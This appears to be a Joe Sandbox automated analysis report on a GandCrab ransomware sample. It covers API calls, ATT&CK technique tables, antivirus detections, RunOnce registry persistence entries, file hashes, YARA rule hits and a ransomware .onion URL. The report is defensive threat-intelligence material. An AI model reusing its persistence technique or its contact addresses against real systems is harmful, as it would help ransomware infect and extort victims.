                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                Source: C:\Users\user\Desktop\IJr8RvvhZ3.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                Source: C:\Users\user\Desktop\IJr8RvvhZ3.exeCode function: 0_2_0F147490 VirtualAlloc,VirtualAlloc,GetUserNameW,VirtualAlloc,GetComputerNameW,wsprintfW,VirtualAlloc,wsprintfW,VirtualAlloc,RegOpenKeyExW,RegQueryValueExW,GetLastError,RegCloseKey,VirtualFree,VirtualAlloc,VirtualAlloc,wsprintfW,RegOpenKeyExW,RegQueryValueExW,GetLastError,RegCloseKey,lstrcmpiW,wsprintfW,VirtualFree,VirtualAlloc,VirtualAlloc,wsprintfW,GetNativeSystemInfo,VirtualAlloc,wsprintfW,ExitProcess,wsprintfW,VirtualAlloc,VirtualAlloc,GetWindowsDirectoryW,GetVolumeInformationW,lstrlenW,wsprintfW,lstrcatW,lstrcatW,GetModuleHandleW,GetProcAddress,lstrlenW,VirtualFree,lstrcatW,VirtualAlloc,GetDriveTypeW,lstrcatW,lstrcatW,lstrcatW,GetDiskFreeSpaceW,lstrlenW,wsprintfW,wsprintfW,lstrlenW,lstrlenW,wsprintfW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,lstrlenW,VirtualAlloc,VirtualFree,0_2_0F147490
                Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                1
                Replication Through Removable Media
                11
                Native API
                11
                Registry Run Keys / Startup Folder
                1
                Process Injection
                1
                Masquerading
                OS Credential Dumping1
                Query Registry
                1
                Replication Through Removable Media
                11
                Archive Collected Data
                Exfiltration Over Other Network Medium2
                Encrypted Channel
                Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
                Data Encrypted for Impact
                Default AccountsScheduled Task/JobBoot or Logon Initialization Scripts11
                Registry Run Keys / Startup Folder
                1
                Process Injection
                LSASS Memory11
                Security Software Discovery
                Remote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth1
                Ingress Tool Transfer
                Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)1
                Software Packing
                Security Account Manager2
                Process Discovery
                SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration1
                Non-Application Layer Protocol
                Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Binary PaddingNTDS11
                Peripheral Device Discovery
                Distributed Component Object ModelInput CaptureScheduled Transfer1
                Application Layer Protocol
                SIM Card SwapCarrier Billing Fraud
                Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA Secrets1
                Account Discovery
                SSHKeyloggingData Transfer Size Limits1
                Proxy
                Manipulate Device CommunicationManipulate App Store Rankings or Ratings
                Replication Through Removable MediaLaunchdRc.commonRc.commonSteganographyCached Domain Credentials1
                System Owner/User Discovery
                VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                External Remote ServicesScheduled TaskStartup ItemsStartup ItemsCompile After DeliveryDCSync1
                Remote System Discovery
                Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem1
                System Network Configuration Discovery
                Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Masquerading/etc/passwd and /etc/shadow1
                System Network Connections Discovery
                Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
                Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Invalid Code SignatureNetwork Sniffing1
                File and Directory Discovery
                Taint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact
                Compromise Software Dependencies and Development ToolsWindows Command ShellCronCronRight-to-Left OverrideInput Capture44
                System Information Discovery
                Replication Through Removable MediaRemote Data StagingExfiltration Over Physical MediumMail ProtocolsService Stop

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand
                SourceDetectionScannerLabelLink
                IJr8RvvhZ3.exe87%VirustotalBrowse
                IJr8RvvhZ3.exe86%MetadefenderBrowse
                IJr8RvvhZ3.exe96%ReversingLabsWin32.Ransomware.GandCrab
                IJr8RvvhZ3.exe100%AviraTR/Dropper.Gen
                IJr8RvvhZ3.exe100%Joe Sandbox ML
                SourceDetectionScannerLabelLink
                C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe100%AviraTR/Dropper.Gen
                C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe100%Joe Sandbox ML
                SourceDetectionScannerLabelLinkDownload
                25.3.mqsmvj.exe.3490000.0.unpack100%AviraTR/Patched.Ren.GenDownload File
                3.3.mqsmvj.exe.3790000.0.unpack100%AviraTR/Patched.Ren.GenDownload File
                27.0.mqsmvj.exe.f580000.0.unpack100%AviraTR/Dropper.GenDownload File
                22.0.mqsmvj.exe.f580000.0.unpack100%AviraTR/Dropper.GenDownload File
                25.2.mqsmvj.exe.f580000.0.unpack100%AviraTR/Dropper.GenDownload File
                30.0.mqsmvj.exe.f580000.0.unpack100%AviraTR/Dropper.GenDownload File
                0.0.IJr8RvvhZ3.exe.f140000.0.unpack100%AviraTR/Dropper.GenDownload File
                34.2.mqsmvj.exe.f580000.0.unpack100%AviraTR/Dropper.GenDownload File
                39.2.mqsmvj.exe.f580000.0.unpack100%AviraTR/Dropper.GenDownload File
                38.0.mqsmvj.exe.f580000.0.unpack100%AviraTR/Dropper.GenDownload File
                36.0.mqsmvj.exe.f580000.0.unpack100%AviraTR/Dropper.GenDownload File
                23.0.mqsmvj.exe.f580000.0.unpack100%AviraTR/Dropper.GenDownload File
                22.2.mqsmvj.exe.f580000.0.unpack100%AviraTR/Dropper.GenDownload File
                28.0.mqsmvj.exe.f580000.0.unpack100%AviraTR/Dropper.GenDownload File
                19.2.mqsmvj.exe.f580000.0.unpack100%AviraTR/Dropper.GenDownload File
                35.2.mqsmvj.exe.f580000.0.unpack100%AviraTR/Dropper.GenDownload File
                14.3.mqsmvj.exe.32b0000.0.unpack100%AviraTR/Patched.Ren.GenDownload File
                3.0.mqsmvj.exe.f580000.0.unpack100%AviraTR/Dropper.GenDownload File
                16.2.mqsmvj.exe.f580000.0.unpack100%AviraTR/Dropper.GenDownload File
                14.0.mqsmvj.exe.f580000.0.unpack100%AviraTR/Dropper.GenDownload File
                28.3.mqsmvj.exe.3130000.0.unpack100%AviraTR/Patched.Ren.GenDownload File
                16.0.mqsmvj.exe.f580000.0.unpack100%AviraTR/Dropper.GenDownload File
                15.2.mqsmvj.exe.f580000.0.unpack100%AviraTR/Dropper.GenDownload File
                35.3.mqsmvj.exe.3970000.0.unpack100%AviraTR/Patched.Ren.GenDownload File
                19.0.mqsmvj.exe.f580000.0.unpack100%AviraTR/Dropper.GenDownload File
                23.3.mqsmvj.exe.3a70000.0.unpack100%AviraTR/Patched.Ren.GenDownload File
                19.3.mqsmvj.exe.3930000.0.unpack100%AviraTR/Patched.Ren.GenDownload File
                15.0.mqsmvj.exe.f580000.0.unpack100%AviraTR/Dropper.GenDownload File
                39.3.mqsmvj.exe.2fb0000.0.unpack100%AviraTR/Patched.Ren.GenDownload File
                38.2.mqsmvj.exe.f580000.0.unpack100%AviraTR/Dropper.GenDownload File
                11.3.mqsmvj.exe.3290000.0.unpack100%AviraTR/Patched.Ren.GenDownload File
                37.2.mqsmvj.exe.f580000.0.unpack100%AviraTR/Dropper.GenDownload File
                0.2.IJr8RvvhZ3.exe.f140000.0.unpack100%AviraTR/Dropper.GenDownload File
                26.0.mqsmvj.exe.f580000.0.unpack100%AviraTR/Dropper.GenDownload File
                11.2.mqsmvj.exe.f580000.0.unpack100%AviraTR/Dropper.GenDownload File
                39.0.mqsmvj.exe.f580000.0.unpack100%AviraTR/Dropper.GenDownload File
                26.2.mqsmvj.exe.f580000.0.unpack100%AviraTR/Dropper.GenDownload File
                16.3.mqsmvj.exe.3b50000.0.unpack100%AviraTR/Patched.Ren.GenDownload File
                27.2.mqsmvj.exe.f580000.0.unpack100%AviraTR/Dropper.GenDownload File
                12.2.mqsmvj.exe.f580000.0.unpack100%AviraTR/Dropper.GenDownload File
                30.2.mqsmvj.exe.f580000.0.unpack100%AviraTR/Dropper.GenDownload File
                25.0.mqsmvj.exe.f580000.0.unpack100%AviraTR/Dropper.GenDownload File
                3.2.mqsmvj.exe.f580000.0.unpack100%AviraTR/Dropper.GenDownload File
                12.3.mqsmvj.exe.2fb0000.0.unpack100%AviraTR/Patched.Ren.GenDownload File
                28.2.mqsmvj.exe.f580000.0.unpack100%AviraTR/Dropper.GenDownload File
                34.0.mqsmvj.exe.f580000.0.unpack100%AviraTR/Dropper.GenDownload File
                36.2.mqsmvj.exe.f580000.0.unpack100%AviraTR/Dropper.GenDownload File
                23.2.mqsmvj.exe.f580000.0.unpack100%AviraTR/Dropper.GenDownload File
                35.0.mqsmvj.exe.f580000.0.unpack100%AviraTR/Dropper.GenDownload File
                30.3.mqsmvj.exe.3470000.0.unpack100%AviraTR/Patched.Ren.GenDownload File
                37.3.mqsmvj.exe.3bc0000.0.unpack100%AviraTR/Patched.Ren.GenDownload File
                0.3.IJr8RvvhZ3.exe.3210000.0.unpack100%AviraTR/Patched.Ren.GenDownload File
                11.0.mqsmvj.exe.f580000.0.unpack100%AviraTR/Dropper.GenDownload File
                27.3.mqsmvj.exe.3490000.0.unpack100%AviraTR/Patched.Ren.GenDownload File
                37.0.mqsmvj.exe.f580000.0.unpack100%AviraTR/Dropper.GenDownload File
                12.0.mqsmvj.exe.f580000.0.unpack100%AviraTR/Dropper.GenDownload File
                14.2.mqsmvj.exe.f580000.0.unpack100%AviraTR/Dropper.GenDownload File
                No Antivirus matches
                SourceDetectionScannerLabelLink
                http://gdcbmuveqjsli57x.onion/63b5ce1c617217a5100%Avira URL Cloudmalware
                https://tox.chat/download.html0%URL Reputationsafe
                NameIPActiveMaliciousAntivirus DetectionReputation
                ipv4bot.whatismyipaddress.com
                unknown
                unknownfalse
                  high
                  NameSourceMaliciousAntivirus DetectionReputation
                  http://ipv4bot.whatismyipaddress.com/amqsmvj.exe, 0000000C.00000002.343812574.0000000000873000.00000004.00000020.00020000.00000000.sdmp, mqsmvj.exe, 0000000C.00000003.343418273.0000000000873000.00000004.00000020.00020000.00000000.sdmpfalse
                    high
                    https://www.torproject.org/IJr8RvvhZ3.exe, 00000000.00000002.257994631.000000000F152000.00000004.00000001.01000000.00000003.sdmp, mqsmvj.exe, 00000003.00000002.298139854.000000000F592000.00000004.00000001.01000000.00000006.sdmp, mqsmvj.exe, 0000000B.00000002.328015412.000000000F592000.00000004.00000001.01000000.00000006.sdmp, mqsmvj.exe, 0000000C.00000002.344084967.000000000F592000.00000004.00000001.01000000.00000006.sdmp, mqsmvj.exe, 0000000E.00000002.374552502.000000000F592000.00000004.00000001.01000000.00000006.sdmp, mqsmvj.exe, 00000010.00000002.406166723.000000000F592000.00000004.00000001.01000000.00000006.sdmp, mqsmvj.exe, 00000013.00000002.437026618.000000000F592000.00000004.00000001.01000000.00000006.sdmp, mqsmvj.exe, 00000017.00000002.473021592.000000000F592000.00000004.00000001.01000000.00000006.sdmp, mqsmvj.exe, 00000019.00000002.502628191.000000000F592000.00000004.00000001.01000000.00000006.sdmp, mqsmvj.exe, 0000001B.00000002.543807830.000000000F592000.00000004.00000001.01000000.00000006.sdmp, mqsmvj.exe, 0000001C.00000002.559901286.000000000F592000.00000004.00000001.01000000.00000006.sdmp, mqsmvj.exe, 0000001E.00000002.598229388.000000000F592000.00000004.00000001.01000000.00000006.sdmp, mqsmvj.exe, 00000023.00000002.638125851.000000000F592000.00000004.00000001.01000000.00000006.sdmp, mqsmvj.exe, 00000025.00000002.681251272.000000000F592000.00000004.00000001.01000000.00000006.sdmp, mqsmvj.exe, 00000027.00000002.720286366.000000000F592000.00000004.00000001.01000000.00000006.sdmpfalse
                      high
                      http://ipv4bot.whatismyipaddress.com/$mqsmvj.exe, 0000000C.00000002.343769957.0000000000838000.00000004.00000020.00020000.00000000.sdmpfalse
                        high
                        http://ipv4bot.whatismyipaddress.com/4mqsmvj.exe, 0000000C.00000002.343812574.0000000000873000.00000004.00000020.00020000.00000000.sdmp, mqsmvj.exe, 0000000C.00000003.343418273.0000000000873000.00000004.00000020.00020000.00000000.sdmpfalse
                          high
                          http://ipv4bot.whatismyipaddress.com/CwXmqsmvj.exe, 0000000E.00000002.373523162.0000000000AD8000.00000004.00000020.00020000.00000000.sdmpfalse
                            high
                            http://gdcbmuveqjsli57x.onion/63b5ce1c617217a5IJr8RvvhZ3.exe, 00000000.00000002.257994631.000000000F152000.00000004.00000001.01000000.00000003.sdmp, mqsmvj.exe, 00000003.00000002.298139854.000000000F592000.00000004.00000001.01000000.00000006.sdmp, mqsmvj.exe, 0000000B.00000002.328015412.000000000F592000.00000004.00000001.01000000.00000006.sdmp, mqsmvj.exe, 0000000C.00000002.344084967.000000000F592000.00000004.00000001.01000000.00000006.sdmp, mqsmvj.exe, 0000000E.00000002.374552502.000000000F592000.00000004.00000001.01000000.00000006.sdmp, mqsmvj.exe, 00000010.00000002.406166723.000000000F592000.00000004.00000001.01000000.00000006.sdmp, mqsmvj.exe, 00000013.00000002.437026618.000000000F592000.00000004.00000001.01000000.00000006.sdmp, mqsmvj.exe, 00000017.00000002.473021592.000000000F592000.00000004.00000001.01000000.00000006.sdmp, mqsmvj.exe, 00000019.00000002.502628191.000000000F592000.00000004.00000001.01000000.00000006.sdmp, mqsmvj.exe, 0000001B.00000002.543807830.000000000F592000.00000004.00000001.01000000.00000006.sdmp, mqsmvj.exe, 0000001C.00000002.559901286.000000000F592000.00000004.00000001.01000000.00000006.sdmp, mqsmvj.exe, 0000001E.00000002.598229388.000000000F592000.00000004.00000001.01000000.00000006.sdmp, mqsmvj.exe, 00000023.00000002.638125851.000000000F592000.00000004.00000001.01000000.00000006.sdmp, mqsmvj.exe, 00000025.00000002.681251272.000000000F592000.00000004.00000001.01000000.00000006.sdmp, mqsmvj.exe, 00000027.00000002.720286366.000000000F592000.00000004.00000001.01000000.00000006.sdmptrue
                            • Avira URL Cloud: malware
                            unknown
                            http://ipv4bot.whatismyipaddress.com/9I)mqsmvj.exe, 00000019.00000002.501583638.0000000000D18000.00000004.00000020.00020000.00000000.sdmpfalse
                              high
                              http://ipv4bot.whatismyipaddress.com/Imqsmvj.exe, 0000000B.00000002.327597151.000000000093A000.00000004.00000020.00020000.00000000.sdmpfalse
                                high
                                http://ipv4bot.whatismyipaddress.com/mqsmvj.exe, 0000000B.00000002.327597151.000000000093A000.00000004.00000020.00020000.00000000.sdmp, mqsmvj.exe, 0000000C.00000002.343812574.0000000000873000.00000004.00000020.00020000.00000000.sdmp, mqsmvj.exe, 0000000C.00000003.343418273.0000000000873000.00000004.00000020.00020000.00000000.sdmp, mqsmvj.exe, 0000000C.00000002.343769957.0000000000838000.00000004.00000020.00020000.00000000.sdmp, mqsmvj.exe, 0000000E.00000002.373523162.0000000000AD8000.00000004.00000020.00020000.00000000.sdmp, mqsmvj.exe, 00000019.00000002.501583638.0000000000D18000.00000004.00000020.00020000.00000000.sdmpfalse
                                  high
                                  https://tox.chat/download.htmlIJr8RvvhZ3.exe, 00000000.00000002.257994631.000000000F152000.00000004.00000001.01000000.00000003.sdmp, mqsmvj.exe, 00000003.00000002.298139854.000000000F592000.00000004.00000001.01000000.00000006.sdmp, mqsmvj.exe, 0000000B.00000002.328015412.000000000F592000.00000004.00000001.01000000.00000006.sdmp, mqsmvj.exe, 0000000C.00000002.344084967.000000000F592000.00000004.00000001.01000000.00000006.sdmp, mqsmvj.exe, 0000000E.00000002.374552502.000000000F592000.00000004.00000001.01000000.00000006.sdmp, mqsmvj.exe, 00000010.00000002.406166723.000000000F592000.00000004.00000001.01000000.00000006.sdmp, mqsmvj.exe, 00000013.00000002.437026618.000000000F592000.00000004.00000001.01000000.00000006.sdmp, mqsmvj.exe, 00000017.00000002.473021592.000000000F592000.00000004.00000001.01000000.00000006.sdmp, mqsmvj.exe, 00000019.00000002.502628191.000000000F592000.00000004.00000001.01000000.00000006.sdmp, mqsmvj.exe, 0000001B.00000002.543807830.000000000F592000.00000004.00000001.01000000.00000006.sdmp, mqsmvj.exe, 0000001C.00000002.559901286.000000000F592000.00000004.00000001.01000000.00000006.sdmp, mqsmvj.exe, 0000001E.00000002.598229388.000000000F592000.00000004.00000001.01000000.00000006.sdmp, mqsmvj.exe, 00000023.00000002.638125851.000000000F592000.00000004.00000001.01000000.00000006.sdmp, mqsmvj.exe, 00000025.00000002.681251272.000000000F592000.00000004.00000001.01000000.00000006.sdmp, mqsmvj.exe, 00000027.00000002.720286366.000000000F592000.00000004.00000001.01000000.00000006.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  No contacted IP infos
                                  Joe Sandbox Version:35.0.0 Citrine
                                  Analysis ID:694560
                                  Start date and time:2022-08-31 23:50:56 +02:00
                                  Joe Sandbox Product:CloudBasic
                                  Overall analysis duration:0h 13m 29s
                                  Hypervisor based Inspection enabled:false
                                  Report type:full
                                  Sample file name:IJr8RvvhZ3.exe
                                  Cookbook file name:default.jbs
                                  Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                  Number of analysed new started processes analysed:40
                                  Number of new started drivers analysed:0
                                  Number of existing processes analysed:0
                                  Number of existing drivers analysed:0
                                  Number of injected processes analysed:0
                                  Technologies:
                                  • HCA enabled
                                  • EGA enabled
                                  • HDC enabled
                                  • AMSI enabled
                                  Analysis Mode:default
                                  Analysis stop reason:Timeout
                                  Detection:MAL
                                  Classification:mal100.rans.troj.evad.winEXE@21/1@15/0
                                  EGA Information:
                                  • Successful, ratio: 100%
                                  HDC Information:
                                  • Successful, ratio: 99% (good quality ratio 95.1%)
                                  • Quality average: 83%
                                  • Quality standard deviation: 24.8%
                                  HCA Information:
                                  • Successful, ratio: 99%
                                  • Number of executed functions: 72
                                  • Number of non-executed functions: 96
                                  Cookbook Comments:
                                  • Found application associated with file extension: .exe
                                  • Adjust boot time
                                  • Enable AMSI
                                  • Override analysis time to 240s for sample files taking high CPU consumption
                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, wuapihost.exe
                                  • Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, client.wns.windows.com, fs.microsoft.com, eudb.ris.api.iris.microsoft.com, ctldl.windowsupdate.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
                                  • Not all processes where analyzed, report is missing behavior information
                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                  TimeTypeDescription
                                  23:52:02AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce qwipuxgrdpk "C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe"
                                  23:52:12AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\RunOnce qwipuxgrdpk "C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe"
                                  23:52:20AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\RunOnce tlrxymtwiqr "C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe"
                                  23:52:29AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\RunOnce soasnzfwfwv "C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe"
                                  23:52:40AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\RunOnce xxjrkojdmxk "C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe"
                                  23:52:49AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\RunOnce xbugmifmcap "C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe"
                                  23:53:04AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce tlrxymtwiqr "C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe"
                                  23:53:13AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce soasnzfwfwv "C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe"
                                  23:53:22AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce xxjrkojdmxk "C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe"
                                  23:53:30AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce xbugmifmcap "C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe"
                                  23:53:40AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce bahswixbtvj "C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe"
                                  23:53:49AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce dpmkfuaielt "C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe"
                                  23:54:01AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce eeukvfrmhuc "C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe"
                                  23:54:10AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce yzthpvkcmuu "C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe"
                                  23:54:21AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce ponrvbljnrm "C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe"
                                  23:54:34AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\RunOnce bahswixbtvj "C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe"
                                  23:54:43AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\RunOnce dpmkfuaielt "C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe"
                                  23:54:54AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\RunOnce eeukvfrmhuc "C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe"
                                  23:55:02AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\RunOnce yzthpvkcmuu "C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe"
                                  23:55:12AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\RunOnce ponrvbljnrm "C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe"
                                  No context
                                  No context
                                  No context
                                  No context
                                  No context
                                  Process:C:\Users\user\Desktop\IJr8RvvhZ3.exe
                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                  Category:dropped
                                  Size (bytes):71680
                                  Entropy (8bit):6.490172186221231
                                  Encrypted:false
                                  SSDEEP:1536:VZZZZZZZZZZZZpXzzzzzzzzzzzzADypczUk+lkZJngWMqqU+2bbbAV2/S2OvvdZl:Ed5BJHMqqDL2/Ovvdr
                                  MD5:937D3395BC50812DBAB14034E2FCC25B
                                  SHA1:DB221BDAAE201CD4CD39EC97CE6FA933DA9FACFB
                                  SHA-256:B34EF0C18F05108E829F41196C84E5A9C93FBB4C03D61CF42BB277AC1D1A7ABA
                                  SHA-512:02EFC4F8FBAEF139B392AE60F8678CBCC1C84761F80CBA3642DCF519D06B1FF63D1499917B8A50424F6EAF54E6141D513DB1D2D42730EED4192BB0EC1D7A546D
                                  Malicious:true
                                  Yara Hits:
                                  • Rule: ReflectiveLoader, Description: Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe, Author: Florian Roth
                                  • Rule: SUSP_RANSOMWARE_Indicator_Jul20, Description: Detects ransomware indicator, Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe, Author: Florian Roth
                                  • Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe, Author: Joe Security
                                  • Rule: INDICATOR_SUSPICIOUS_ReflectiveLoader, Description: detects Reflective DLL injection artifacts, Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe, Author: ditekSHen
                                  • Rule: Gandcrab, Description: Gandcrab Payload, Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe, Author: kevoreilly
                                  • Rule: Win32_Ransomware_GandCrab, Description: unknown, Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe, Author: ReversingLabs
                                  Antivirus:
                                  • Antivirus: Avira, Detection: 100%
                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                  Reputation:low
